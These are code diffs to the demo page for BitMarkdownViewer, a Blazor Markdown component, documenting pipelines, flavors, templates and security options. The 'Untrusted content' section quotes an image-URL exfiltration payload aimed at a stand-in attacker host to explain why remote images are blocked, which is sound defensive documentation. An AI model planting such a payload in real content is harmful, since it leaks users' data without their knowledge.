+                <code>&lt;details&gt;</code> with the title as its <code>&lt;summary&gt;</code>, which is the only way
+                to a collapsible section in a language that has no syntax for one.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@containersMarkdown" Pipeline="@containersPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Definition lists" RazorCode="@example10RazorCode" CsharpCode="@example10CsharpCode" Id="example10">
+            <div>
+                A glossary, a set of options or an API reference is a list of terms and what they mean, and HTML has an
+                element for exactly that. <code>UseDefinitionLists()</code> reads a term on its own line followed by
+                <code>: its definition</code> - the shape Pandoc and markdown-it use - into a real
+                <code>&lt;dl&gt;</code> of <code>&lt;dt&gt;</code> and <code>&lt;dd&gt;</code>. A term may carry several
+                definitions, and a definition indented under its own text may run to several paragraphs or hold a
+                nested list.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@definitionListMarkdown" Pipeline="@definitionListPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Abbreviations" RazorCode="@example11RazorCode" CsharpCode="@example11CsharpCode" Id="example11">
+            <div>
+                <code>UseAbbreviations()</code> lets a document explain its jargon once. A
+                <code>*[HTML]: HyperText Markup Language</code> line declares the term and renders nothing; every
+                whole-word occurrence of it afterwards becomes an <code>&lt;abbr&gt;</code> carrying the expansion, so it
+                is a tooltip for a reader and a spoken expansion for a screen reader. Only text is rewritten -
+                <code>HTMLElement</code> keeps its own name and a term inside <code>code</code> stays literal - and where
+                two terms overlap the longer one wins.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@abbreviationMarkdown" Pipeline="@abbreviationPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Mathematics" RazorCode="@example12RazorCode" CsharpCode="@example12CsharpCode" Id="example12">
+            <div>
+                <code>UseMathematics()</code> reads <code>$inline$</code> and <code>$$display$$</code>. Its first job is
+                protection: TeX is made of the underscores, asterisks and backslashes Markdown itself is made of, so
+                without it <code>$a_1 + b_1$</code> loses its subscripts to emphasis. What survives is kept verbatim and
+                marked up as <code>span.math-inline</code> / <code>div.math-display</code> with its delimiters intact, so
+                KaTeX or MathJax on the page typesets it with no configuration - and with neither loaded it simply reads
+                as the TeX it is. Prices are safe: a <code>$</code> followed by a space, or a closing one followed by a
+                digit, is never a delimiter.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@mathMarkdown" Pipeline="@mathPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Figures" RazorCode="@example13RazorCode" CsharpCode="@example13CsharpCode" Id="example13">
+            <div>
+                An image that stands on its own usually wants a caption under it. <code>UseFigures()</code> turns a
+                paragraph holding nothing but a titled image into a <code>&lt;figure&gt;</code> with the title as its
+                <code>&lt;figcaption&gt;</code>. The caption comes from the title and never from the alt text: alt
+                describes the picture for someone who cannot see it, a caption is read by everyone, and using one text
+                for both would have a screen reader say the same sentence twice. An image with no title is left exactly
+                as it was.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@figureMarkdown" Pipeline="@figurePipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Line breaks" RazorCode="@example14RazorCode" CsharpCode="@example14CsharpCode" Id="example14">
             <div>
                 Markdown reflows a single newline into the same paragraph; a break needs two trailing spaces or a
                 trailing backslash. That surprises people typing into a chat or comment box, so
@@ -98,7 +228,7 @@
             </div>
         </DemoExample>
 
-        <DemoExample Title="Custom pipeline" RazorCode="@example7RazorCode" CsharpCode="@example7CsharpCode" Id="example7">
+        <DemoExample Title="Custom pipeline" RazorCode="@example15RazorCode" CsharpCode="@example15CsharpCode" Id="example15">
             <div>
                 Compose exactly the flavors you want with <code>BitMarkdownPipelineBuilder</code>. A built pipeline is
                 immutable and thread-safe, so build it once (a field, or a singleton) and share it - passing a
@@ -108,7 +238,7 @@
             <BitMarkdownViewer Markdown="@customMarkdown" Pipeline="customPipeline" />
         </DemoExample>
 
-        <DemoExample Title="Untrusted content" RazorCode="@example8RazorCode" CsharpCode="@example8CsharpCode" Id="example8">
+        <DemoExample Title="Untrusted content" RazorCode="@example16RazorCode" CsharpCode="@example16CsharpCode" Id="example16">
             <div>
                 Rendering Markdown you did not write needs more than URL sanitizing. <code>ImageRendering</code> decides
                 which image sources may load: a remote image is fetched the moment it renders, so
@@ -137,13 +267,15 @@
                                MaxLength="100000" />
         </DemoExample>
 
-        <DemoExample Title="Table of contents" RazorCode="@example9RazorCode" CsharpCode="@example9CsharpCode" Id="example9">
+        <DemoExample Title="Table of contents" RazorCode="@example17RazorCode" CsharpCode="@example17CsharpCode" Id="example17">
             <div>
                 <code>OnParsed</code> hands you the parsed document just before it is rendered, and
                 <code>Document</code> exposes the same tree afterwards. Walking it with
                 <code>BitMarkdownAstHelper.Descendants</code> is how you read structure out of a document without parsing
                 it twice - here, the headings and the slugs the <code>UseAutoIdentifiers()</code> extension gave them,
-                turned into a navigation rail.
+                turned into a navigation rail. <code>BitMarkdownAstHelper.ToPlainText</code> reads the other half out of
+                the same tree: what the document says with none of the markup it says it with, which is the text a
+                search index, an excerpt or a meta description is built from.
             </div>
             <br />
             <div class="mdv-toc-layout">
@@ -156,9 +288,137 @@
                 </nav>
                 <BitMarkdownViewer Markdown="@tocMarkdown" Pipeline="BitMarkdownPipelines.Advanced" OnParsed="HandleParsed" />
             </div>
+            <div class="mdv-hint">Excerpt: @tocExcerpt</div>
         </DemoExample>
 
-        <DemoExample Title="Playground" RazorCode="@example10RazorCode" CsharpCode="@example10CsharpCode" Id="example10">
+        <DemoExample Title="Heading anchors" RazorCode="@example18RazorCode" CsharpCode="@example18CsharpCode" Id="example18">
+            <div>
+                <code>UseAutoIdentifiers(anchorLinks: true)</code> adds the permalink a documentation site is expected
+                to have: every heading keeps its generated id and gains a <code>#</code> link back to itself, so a
+                reader can copy a link straight to a section. The glyph is hidden from assistive technology and the link
+                is named after its heading instead, so it is announced as "Permalink to Installation" rather than as a
+                punctuation mark; it stays invisible until the heading is hovered or the link itself is focused.
+                A heading may also name its own id by ending with <code>{#the-id}</code>, which is worth doing wherever a
+                generated slug would change with the wording - every link already pointing at that section breaks the
+                moment it does. The marker names the heading and is not part of what it says, so it never reaches the
+                rendered text.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@anchorsMarkdown" Pipeline="@anchorsPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Inline" RazorCode="@example19RazorCode" Id="example19">
+            <div>
+                Markdown is a block language, so even a single sentence renders inside a <code>&lt;p&gt;</code> that
+                takes a line of its own. Setting <code>Inline</code> renders the root as a <code>span</code> and drops
+                the paragraph wrappers, letting a short piece of Markdown sit inside a sentence, a table cell or a
+                label. Blocks that are not paragraphs still render as themselves, so nothing is silently lost - and
+                because a <code>span</code> may not legally hold a list or a table, a document that turns out to hold
+                one keeps its <code>div</code> and is laid out inline by the stylesheet instead.
+            </div>
+            <br />
+            <div>
+                Formatting a value in place:
+                <BitMarkdownViewer Inline Markdown="@("the **fastest** path is `Span<T>` - [read why](https://learn.microsoft.com/dotnet/api/system.span-1)")" />
+            </div>
+        </DemoExample>
+
+        <DemoExample Title="Templates" RazorCode="@example20RazorCode" Id="example20">
+            <div>
+                The three node types a host most often wants to draw itself take a template, so your
+                own component can sit in the middle of a rendered document without writing a renderer or a pipeline.
+                <code>CodeBlockTemplate</code> is where a syntax highlighter, a copy button or a diagram renderer goes -
+                it is handed the block, so it can read the language off <code>Info</code> and the source off
+                <code>Content</code>. <code>ImageTemplate</code> is for a lightbox or a placeholder, and
+                <code>LinkTemplate</code> for routing an in-app destination through the router. Every safeguard has
+                already run when a template does: the URL is sanitized, and an image the
+                <code>ImageRendering</code> policy blocked arrives with an empty <code>Url</code>. Anything else is
+                still open to a <code>BitMarkdownNodeRenderer</code> of your own on the pipeline.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@templatesMarkdown" Pipeline="BitMarkdownPipelines.GitHub">
+                <CodeBlockTemplate>
+                    <div class="mdv-code-card">
+                        <div class="mdv-code-card-head">
+                            <span>@(context.Info ?? "text")</span>
+                            <BitButton Size="BitSize.Small" Variant="BitVariant.Text" IconName="@BitIconName.Copy" Title="Copy" />
+                        </div>
+                        <pre><code>@context.Content</code></pre>
+                    </div>
+                </CodeBlockTemplate>
+                <LinkTemplate>
+                    <BitLink Href="@context.Url">
+                        @BitMarkdownInlineHelpers.PlainText(context.Children)
+                        <BitIcon IconName="@BitIconName.NavigateExternalInline" />
+                    </BitLink>
+                </LinkTemplate>
+            </BitMarkdownViewer>
+        </DemoExample>
+
+        <DemoExample Title="Interactive task lists" RazorCode="@example21RazorCode" CsharpCode="@example21CsharpCode" Id="example21">
+            <div>
+                Task-list checkboxes are read-only by default, exactly as GitHub renders them. Handling
+                <code>OnTaskChanged</code> is what makes them live: the boxes become enabled, and ticking one reports
+                its index, its new state, and the <b>source rewritten to match</b> - so storing the change is one
+                assignment. The viewer never edits <code>Markdown</code> behind your back; the state stays the one you
+                own. The rewrite counts the same markers the renderer drew, skipping any inside code blocks, and
+                <code>BitMarkdownTaskList.Toggle</code> is the same helper if you would rather call it yourself.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@taskListMarkdown"
+                               Pipeline="BitMarkdownPipelines.GitHub"
+                               OnTaskChanged="HandleTaskChanged" />
+            <div class="mdv-hint">@taskListStatus</div>
+        </DemoExample>
+
+        <DemoExample Title="Link policy" RazorCode="@example22RazorCode" CsharpCode="@example22CsharpCode" Id="example22">
+            <div>
+                By default a link to another origin opens in a new tab with <code>rel="noopener noreferrer"</code>, and
+                a link within the site opens in place. <code>UseLinkOptions()</code> changes that policy: keep
+                everything in the same tab, which is what a viewer embedded in an app usually wants, or mark
+                user-written links <code>nofollow ugc</code> - the two words that stop a comment box from becoming a
+                link farm and tell a search engine the site did not write them.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@linkPolicyMarkdown" Pipeline="@linkPolicyPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Rewriting URLs" RazorCode="@example23RazorCode" CsharpCode="@example23CsharpCode" Id="example23">
+            <div>
+                A README's relative paths point at the repository it lives in, so rendering it anywhere else breaks
+                every image and every link in it. <code>UseBaseUrl()</code> resolves the relative ones against an
+                address you choose and leaves absolute destinations and in-page fragments alone;
+                <code>UseUrlRewriter()</code> is the general form, for pointing images at a CDN or stripping tracking
+                parameters. Whatever a rewriter returns is sanitized again on the way out, so it cannot reintroduce an
+                unsafe destination - and returning <code>null</code> drops the destination while keeping the text.
+            </div>
+            <br />
+            <div class="mdv-columns">
+                <div class="mdv-column">
+                    <div class="mdv-column-title">Default</div>
+                    <BitMarkdownViewer Markdown="@baseUrlMarkdown" ImageRendering="BitMarkdownViewerImageRendering.All" />
+                </div>
+                <div class="mdv-column">
+                    <div class="mdv-column-title">UseBaseUrl(...)</div>
+                    <BitMarkdownViewer Markdown="@baseUrlMarkdown" Pipeline="@baseUrlPipeline" ImageRendering="BitMarkdownViewerImageRendering.All" />
+                </div>
+            </div>
+        </DemoExample>
+
+        <DemoExample Title="Localization" RazorCode="@example24RazorCode" CsharpCode="@example24CsharpCode" Id="example24">
+            <div>
+                Most of a rendered document is the author's words, but a few are the renderers' own: an alert's title,
+                a footnote's back-link, the accessible name of a table's scroll region or of a heading's permalink.
+                Those default to English, and <code>UseTexts()</code> replaces them. They belong to the pipeline
+                because a rendered document has no other place to learn what language it is in - so the same
+                <code>BitMarkdownTexts</code> travels with the flavors, and the numbered ones take their number
+                through <code>{0}</code>.
+            </div>
+            <br />
+            <BitMarkdownViewer Dir="BitDir.Rtl" Markdown="@localizedMarkdown" Pipeline="@localizedPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Playground" RazorCode="@example25RazorCode" CsharpCode="@example25CsharpCode" Id="example25">
             <div>
                 Everything above, live. Type on the left and the right re-parses as you go; switch the flavor to see the
                 same source under the three ready-made pipelines - <code>Basic</code> (CommonMark only),
@@ -200,7 +460,7 @@
             </div>
         </DemoExample>
 
-        <DemoExample Title="Style & Class" RazorCode="@example11RazorCode" CodeFiles="@example11CodeFiles" Id="example11">
+        <DemoExample Title="Style & Class" RazorCode="@example26RazorCode" CodeFiles="@example26CodeFiles" Id="example26">
             <div>
                 Use <code>Style</code> and <code>Class</code> to style the wrapper the document is rendered into. Because
                 the output is real DOM, the elements inside it are styled with ordinary CSS descendant rules - no
@@ -213,7 +473,7 @@
             <BitMarkdownViewer Class="custom-mdv" Markdown="@("### A classy viewer\n\nEvery `code` span and heading inside it is restyled from the page's own stylesheet.")" />
         </DemoExample>
 
-        <DemoExample Title="RTL" RazorCode="@example12RazorCode" CsharpCode="@example12CsharpCode" Id="example12">
+        <DemoExample Title="RTL" RazorCode="@example27RazorCode" CsharpCode="@example27CsharpCode" Id="example27">
             <div>
                 Set <code>Dir="BitDir.Rtl"</code> to render a right-to-left document. The stylesheet is written with
                 logical properties throughout, so block-quote bars, list indentation and table alignment all flip with

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
@@ -121,9 +121,11 @@
                 block fenced by <code>---</code> (YAML) or <code>+++</code> (TOML). Without
                 <code>UseFrontMatter()</code> that block is ordinary Markdown - a thematic break followed by a heading -
                 so the file renders with its metadata splashed across the top. The extension parses it into a
-                <code>BitMarkdownFrontMatterNode</code> that renders nothing and keeps the raw text, which
-                <code>BitMarkdownFrontMatterNode.Find(document)</code> reads back for you to hand to whichever
-                serializer you already use.
+                <code>BitMarkdownFrontMatterNode</code> that renders nothing and keeps the raw text. Reading that text
+                back needs the parsed document, which is what <code>OnParsed</code> hands you - it is raised with the
+                tree the renderer is about to walk, just before it does - and
+                <code>BitMarkdownFrontMatterNode.Find(document)</code> finds the node in it, for you to hand to
+                whichever serializer you already use.
             </div>
             <br />
             <div class="mdv-columns">
@@ -269,8 +271,9 @@
 
         <DemoExample Title="Table of contents" RazorCode="@example17RazorCode" CsharpCode="@example17CsharpCode" Id="example17">
             <div>
-                <code>OnParsed</code> hands you the parsed document just before it is rendered, and
-                <code>Document</code> exposes the same tree afterwards. Walking it with
+                The document <code>OnParsed</code> hands over is good for more than reading one node out of:
+                <code>Document</code> exposes the same tree afterwards, and either way it is the whole document.
+                Walking it with
                 <code>BitMarkdownAstHelper.Descendants</code> is how you read structure out of a document without parsing
                 it twice - here, the headings and the slugs the <code>UseAutoIdentifiers()</code> extension gave them,
                 turned into a navigation rail. <code>BitMarkdownAstHelper.ToPlainText</code> reads the other half out of
@@ -323,7 +326,7 @@
             </div>
         </DemoExample>
 
-        <DemoExample Title="Templates" RazorCode="@example20RazorCode" Id="example20">
+        <DemoExample Title="Templates" RazorCode="@example20RazorCode" CsharpCode="@example20CsharpCode" CodeFiles="@example20CodeFiles" Id="example20">
             <div>
                 The three node types a host most often wants to draw itself take a template, so your
                 own component can sit in the middle of a rendered document without writing a renderer or a pipeline.

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
@@ -2,12 +2,13 @@
 
 <PageOutlet Url="components/markdownviewer"
             Title="MarkdownViewer"
-            Description="BitMarkdownViewer is a native, SEO friendly Blazor component that renders Markdown to HTML entirely in C#, with no JavaScript interop or third-party packages." />
+            Description="BitMarkdownViewer renders Markdown as real DOM entirely in C# - CommonMark plus GitHub flavors, alerts and footnotes - with no JavaScript interop and no third-party packages." />
 
 <DemoPage Name="MarkdownViewer"
-          Description="BitMarkdownViewer is a native, SEO friendly Blazor component that renders Markdown to HTML entirely in C#, with no JavaScript interop and no third-party packages."
+          Description="BitMarkdownViewer is a native, SEO friendly Blazor component that parses Markdown into an AST and renders it straight to the Blazor render tree. It covers CommonMark and, through composable pipelines, the GitHub flavors (tables, task lists, strikethrough, autolinks), alerts, footnotes and emoji - sanitizing URLs and hardening against untrusted input on the way."
           SecondaryNames="@(["MdViewer", "MD"])"
           Parameters="componentParameters"
+          PublicMembers="componentPublicMembers"
           SubClasses="componentSubClasses"
           SubEnums="componentSubEnums"
           GitHubExtrasUrl="MarkdownViewer/BitMarkdownViewer.cs"
@@ -15,18 +16,155 @@
     <NotesTemplate>
         <BitMarkdownViewer Markdown="@("To use this component, you need to install the [**`Bit.BlazorUI.Extras`**](https://www.nuget.org/packages/Bit.BlazorUI.Extras) nuget package, as described in the Optional steps of the [Getting started](/getting-started) page.")" />
         <BitMarkdownViewer Markdown="@("Parsing and rendering happen entirely in C# (no JavaScript interop), so the component renders real DOM and works the same while prerendering, on the server, and on the client.")" />
+        <BitMarkdownViewer Markdown="@("Raw HTML in the source is rendered as text and every link and image URL is sanitized, so untrusted Markdown cannot inject active content.")" />
     </NotesTemplate>
 
     <Examples>
         <DemoExample Title="Basic" RazorCode="@example1RazorCode" Id="example1">
+            <div>
+                Assign a Markdown string to the <code>Markdown</code> parameter. With no <code>Pipeline</code> the component
+                understands the CommonMark core - headings, emphasis, links, images, lists, block quotes, code spans and
+                code blocks - and nothing else, which is the safest starting point for untrusted content.
+            </div>
+            <br />
             <BitMarkdownViewer Markdown="@("# Native Markdown in Blazor\n\nRendered entirely in **C#** with no JavaScript and no third-party packages.\n\n- Real DOM output\n- Safe by default\n- Zero interop")" />
         </DemoExample>
 
         <DemoExample Title="GitHub flavored" RazorCode="@example2RazorCode" CsharpCode="@example2CsharpCode" Id="example2">
+            <div>
+                Richer flavors are opt-in: pass a pipeline to <code>Pipeline</code>. The ready-made
+                <code>BitMarkdownPipelines.GitHub</code> adds the six GitHub flavors - pipe tables with per-column
+                alignment, <code>~~strikethrough~~</code>, task lists, autolink literals that turn bare URLs and email
+                addresses into links, and the footnotes and alerts shown in the next two sections.
+            </div>
+            <br />
             <BitMarkdownViewer Markdown="@gitHubMarkdown" Pipeline="BitMarkdownPipelines.GitHub" />
         </DemoExample>
 
-        <DemoExample Title="Advanced" RazorCode="@example3RazorCode" CsharpCode="@example3CsharpCode" Id="example3">
+        <DemoExample Title="Alerts" RazorCode="@example3RazorCode" CsharpCode="@example3CsharpCode" Id="example3">
+            <div>
+                A block quote whose first line is <code>[!NOTE]</code>, <code>[!TIP]</code>, <code>[!IMPORTANT]</code>,
+                <code>[!WARNING]</code> or <code>[!CAUTION]</code> renders as a titled callout. The kind is written out as
+                a heading rather than signalled by color alone, so it survives a screen reader and a monochrome print.
+                Add it on its own with <code>UseAlerts()</code>, or get it with the GitHub bundle.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@alertsMarkdown" Pipeline="BitMarkdownPipelines.GitHub" />
+        </DemoExample>
+
+        <DemoExample Title="Footnotes" RazorCode="@example4RazorCode" CsharpCode="@example4CsharpCode" Id="example4">
+            <div>
+                A <code>[^label]</code> reference and a <code>[^label]: ...</code> definition anywhere in the document
+                become a numbered footnote. Notes are numbered in the order they are first cited, gathered into one
+                section at the end, and every citation gets its own back-link. A reference with no definition stays plain
+                text and a definition nobody cites is dropped. Add it on its own with <code>UseFootnotes()</code>, or get it
+                with the GitHub bundle - which carries it because <code>[^1]: ...</code> is also a valid link reference
+                definition, so a pipeline with tables but without footnotes would quietly turn the note into a link.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@footnotesMarkdown" Pipeline="BitMarkdownPipelines.GitHub" />
+        </DemoExample>
+
+        <DemoExample Title="References &amp; entities" RazorCode="@example5RazorCode" CsharpCode="@example5CsharpCode" Id="example5">
+            <div>
+                Two core CommonMark features that need no pipeline. A <b>link reference definition</b>
+                (<code>[label]: /url "title"</code>) declares a destination once and lets <code>[text][label]</code>,
+                <code>[text][]</code> and <code>[text]</code> reuse it from anywhere in the document - before or after the
+                definition - keeping long documents readable; the definition line itself is not rendered. And
+                <b>character references</b> (<code>&amp;copy;</code>, <code>&amp;#169;</code>, <code>&amp;#xA9;</code>)
+                are decoded to the characters they name everywhere except inside code, where they stay literal.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@referencesMarkdown" />
+        </DemoExample>
+
+        <DemoExample Title="Line breaks" RazorCode="@example6RazorCode" CsharpCode="@example6CsharpCode" Id="example6">
+            <div>
+                Markdown reflows a single newline into the same paragraph; a break needs two trailing spaces or a
+                trailing backslash. That surprises people typing into a chat or comment box, so
+                <code>UseSoftLineAsHardLine()</code> makes every newline a break instead - the equivalent of the
+                <code>breaks</code> option in marked and markdown-it.
+            </div>
+            <br />
+            <div class="mdv-columns">
+                <div class="mdv-column">
+                    <div class="mdv-column-title">Default</div>
+                    <BitMarkdownViewer Markdown="@lineBreaksMarkdown" />
+                </div>
+                <div class="mdv-column">
+                    <div class="mdv-column-title">UseSoftLineAsHardLine()</div>
+                    <BitMarkdownViewer Markdown="@lineBreaksMarkdown" Pipeline="@softBreakPipeline" />
+                </div>
+            </div>
+        </DemoExample>
+
+        <DemoExample Title="Custom pipeline" RazorCode="@example7RazorCode" CsharpCode="@example7CsharpCode" Id="example7">
+            <div>
+                Compose exactly the flavors you want with <code>BitMarkdownPipelineBuilder</code>. A built pipeline is
+                immutable and thread-safe, so build it once (a field, or a singleton) and share it - passing a
+                newly-built pipeline on every render would re-parse the source every time.
+            </div>
+            <br />
+            <BitMarkdownViewer Markdown="@customMarkdown" Pipeline="customPipeline" />
+        </DemoExample>
+
+        <DemoExample Title="Untrusted content" RazorCode="@example8RazorCode" CsharpCode="@example8CsharpCode" Id="example8">
+            <div>
+                Rendering Markdown you did not write needs more than URL sanitizing. <code>ImageRendering</code> decides
+                which image sources may load: a remote image is fetched the moment it renders, so
+                <code>![x](https://attacker.com/leak?data=SECRET)</code> exfiltrates whatever the attacker encodes into
+                the URL without any interaction. <code>SameOrigin</code> (the default) blocks cross-origin images and
+                keeps the alt text; <code>None</code> blocks every image; <code>All</code> is for fully trusted sources.
+                Alongside it, <code>StripBidiControlCharacters</code> neutralizes "Trojan Source" (CVE-2021-42574)
+                spoofing, <code>MaxLength</code> caps how much source is parsed, and <code>MaxNestingDepth</code> is an
+                always-on guard against pathologically nested input.
+            </div>
+            <br />
+            <div class="mdv-toolbar">
+                <span class="mdv-label">ImageRendering:</span>
+                @foreach (var mode in imageRenderingModes)
+                {
+                    <BitButton Size="BitSize.Small"
+                               aria-pressed="@(imageRendering == mode)"
+                               Variant="@(imageRendering == mode ? BitVariant.Fill : BitVariant.Outline)"
+                               OnClick="@(() => imageRendering = mode)">@mode</BitButton>
+                }
+            </div>
+            <BitMarkdownViewer Markdown="@untrustedMarkdown"
+                               Pipeline="BitMarkdownPipelines.GitHub"
+                               ImageRendering="@imageRendering"
+                               StripBidiControlCharacters="true"
+                               MaxLength="100000" />
+        </DemoExample>
+
+        <DemoExample Title="Table of contents" RazorCode="@example9RazorCode" CsharpCode="@example9CsharpCode" Id="example9">
+            <div>
+                <code>OnParsed</code> hands you the parsed document just before it is rendered, and
+                <code>Document</code> exposes the same tree afterwards. Walking it with
+                <code>BitMarkdownAstHelper.Descendants</code> is how you read structure out of a document without parsing
+                it twice - here, the headings and the slugs the <code>UseAutoIdentifiers()</code> extension gave them,
+                turned into a navigation rail.
+            </div>
+            <br />
+            <div class="mdv-toc-layout">
+                <nav class="mdv-toc" aria-label="On this page">
+                    <div class="mdv-toc-title">On this page</div>
+                    @foreach (var entry in tocEntries)
+                    {
+                        <a class="@($"mdv-toc-item mdv-toc-level-{entry.Level}")" href="@($"#{entry.Id}")">@entry.Text</a>
+                    }
+                </nav>
+                <BitMarkdownViewer Markdown="@tocMarkdown" Pipeline="BitMarkdownPipelines.Advanced" OnParsed="HandleParsed" />
+            </div>
+        </DemoExample>
+
+        <DemoExample Title="Playground" RazorCode="@example10RazorCode" CsharpCode="@example10CsharpCode" Id="example10">
+            <div>
+                Everything above, live. Type on the left and the right re-parses as you go; switch the flavor to see the
+                same source under the three ready-made pipelines - <code>Basic</code> (CommonMark only),
+                <code>GitHub</code> (plus the GitHub flavors) and <code>Advanced</code> (plus emoji and heading ids). Re-parsing only happens when an input that affects the output actually changes.
+            </div>
+            <br />
             <div class="mdv-playground">
                 <div class="mdv-toolbar">
                     <span class="mdv-label">Flavor:</span>
@@ -62,8 +200,27 @@
             </div>
         </DemoExample>
 
-        <DemoExample Title="Custom pipeline" RazorCode="@example4RazorCode" CsharpCode="@example4CsharpCode" Id="example4">
-            <BitMarkdownViewer Markdown="@customMarkdown" Pipeline="customPipeline" />
+        <DemoExample Title="Style & Class" RazorCode="@example11RazorCode" CodeFiles="@example11CodeFiles" Id="example11">
+            <div>
+                Use <code>Style</code> and <code>Class</code> to style the wrapper the document is rendered into. Because
+                the output is real DOM, the elements inside it are styled with ordinary CSS descendant rules - no
+                <code>::ng-deep</code>-style escape hatch and no <code>innerHTML</code> blob to work around.
+            </div>
+            <br />
+            <BitMarkdownViewer Style="border-inline-start:0.25rem solid var(--bit-clr-pri);padding-inline-start:1rem"
+                               Markdown="@("A **styled** viewer, set apart with an inline `Style`.")" />
+            <br />
+            <BitMarkdownViewer Class="custom-mdv" Markdown="@("### A classy viewer\n\nEvery `code` span and heading inside it is restyled from the page's own stylesheet.")" />
+        </DemoExample>
+
+        <DemoExample Title="RTL" RazorCode="@example12RazorCode" CsharpCode="@example12CsharpCode" Id="example12">
+            <div>
+                Set <code>Dir="BitDir.Rtl"</code> to render a right-to-left document. The stylesheet is written with
+                logical properties throughout, so block-quote bars, list indentation and table alignment all flip with
+                the direction instead of staying pinned to the left.
+            </div>
+            <br />
+            <BitMarkdownViewer Dir="BitDir.Rtl" Markdown="@rtlMarkdown" Pipeline="BitMarkdownPipelines.Advanced" />
         </DemoExample>
     </Examples>
 </DemoPage>

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
@@ -52,7 +52,19 @@ public partial class BitMarkdownViewerDemo
            Type = "int",
            DefaultValue = "0",
            Description = @"When greater than zero, the Markdown source is truncated to this many characters before parsing,
-                           bounding the work done on untrusted input. Defaults to 0 (no limit).",
+                           bounding the work done on untrusted input. The cut never splits a surrogate pair.
+                           Defaults to 0 (no limit).",
+        },
+        new()
+        {
+           Name = "OnParsed",
+           Type = "EventCallback<BitMarkdownDocumentNode>",
+           DefaultValue = "",
+           Description = @"Called after the Markdown source has been parsed, with the document that is about to be rendered.
+                           The tree is the same one the renderer walks, so a handler can read it - to build a table of contents
+                           from the headings, for example - or rewrite it before it reaches the DOM.",
+           LinkType = LinkType.Link,
+           Href = "#markdown-viewer-document-node",
         },
         new()
         {
@@ -66,13 +78,27 @@ public partial class BitMarkdownViewerDemo
         },
     ];
 
+    private readonly List<ComponentParameter> componentPublicMembers =
+    [
+        new()
+        {
+            Name = "Document",
+            Type = "BitMarkdownDocumentNode",
+            DefaultValue = "",
+            Description = @"The most recently parsed document. Useful for reading structure out of the source
+                            (headings, links, images) without parsing it a second time.",
+            LinkType = LinkType.Link,
+            Href = "#markdown-viewer-document-node",
+        },
+    ];
+
     private readonly List<ComponentSubClass> componentSubClasses =
     [
         new()
         {
-            Id = "markdown-viewer-pipeline",
-            Title = "BitMarkdownPipeline",
-            Description = "An immutable, reusable Markdown processing configuration produced by a BitMarkdownPipelineBuilder. Pipelines are thread-safe and should be cached and shared. Ready-made pipelines are available on BitMarkdownPipelines (Basic, GitHub, Advanced).",
+            Id = "markdown-viewer-pipelines",
+            Title = "BitMarkdownPipelines",
+            Description = "The ready-made, cached pipelines. Each is built once and shared, so passing one costs nothing per render.",
             Parameters =
             [
                 new()
@@ -80,8 +106,133 @@ public partial class BitMarkdownViewerDemo
                     Name = "Basic",
                     Type = "static BitMarkdownPipeline",
                     DefaultValue = "",
-                    Description = "A pipeline with only the basic CommonMark core (no flavors).",
+                    Description = "The basic CommonMark core only: headings, emphasis, links, images, lists, block quotes, code, link reference definitions and character references.",
                 },
+                new()
+                {
+                    Name = "GitHub",
+                    Type = "static BitMarkdownPipeline",
+                    DefaultValue = "",
+                    Description = "The GitHub flavors: pipe tables, strikethrough, task lists, autolink literals, footnotes and alerts, on top of the core.",
+                },
+                new()
+                {
+                    Name = "Advanced",
+                    Type = "static BitMarkdownPipeline",
+                    DefaultValue = "",
+                    Description = "The GitHub flavors plus :shortcode: emoji and automatic heading ids.",
+                },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-pipeline-builder",
+            Title = "BitMarkdownPipelineBuilder",
+            Description = "Composes a pipeline from the flavors you want. A freshly created builder holds only the CommonMark core; each Use... call adds one extension, and Build() produces the immutable pipeline. The same extension is only applied once.",
+            Parameters =
+            [
+                new()
+                {
+                    Name = "UsePipeTables",
+                    Type = "BitMarkdownPipelineBuilder UsePipeTables()",
+                    DefaultValue = "",
+                    Description = "Adds GitHub-style pipe tables with per-column alignment.",
+                },
+                new()
+                {
+                    Name = "UseStrikethrough",
+                    Type = "BitMarkdownPipelineBuilder UseStrikethrough()",
+                    DefaultValue = "",
+                    Description = "Adds ~~strikethrough~~.",
+                },
+                new()
+                {
+                    Name = "UseTaskLists",
+                    Type = "BitMarkdownPipelineBuilder UseTaskLists()",
+                    DefaultValue = "",
+                    Description = "Adds GitHub task lists (- [ ] / - [x]).",
+                },
+                new()
+                {
+                    Name = "UseAutoLinks",
+                    Type = "BitMarkdownPipelineBuilder UseAutoLinks()",
+                    DefaultValue = "",
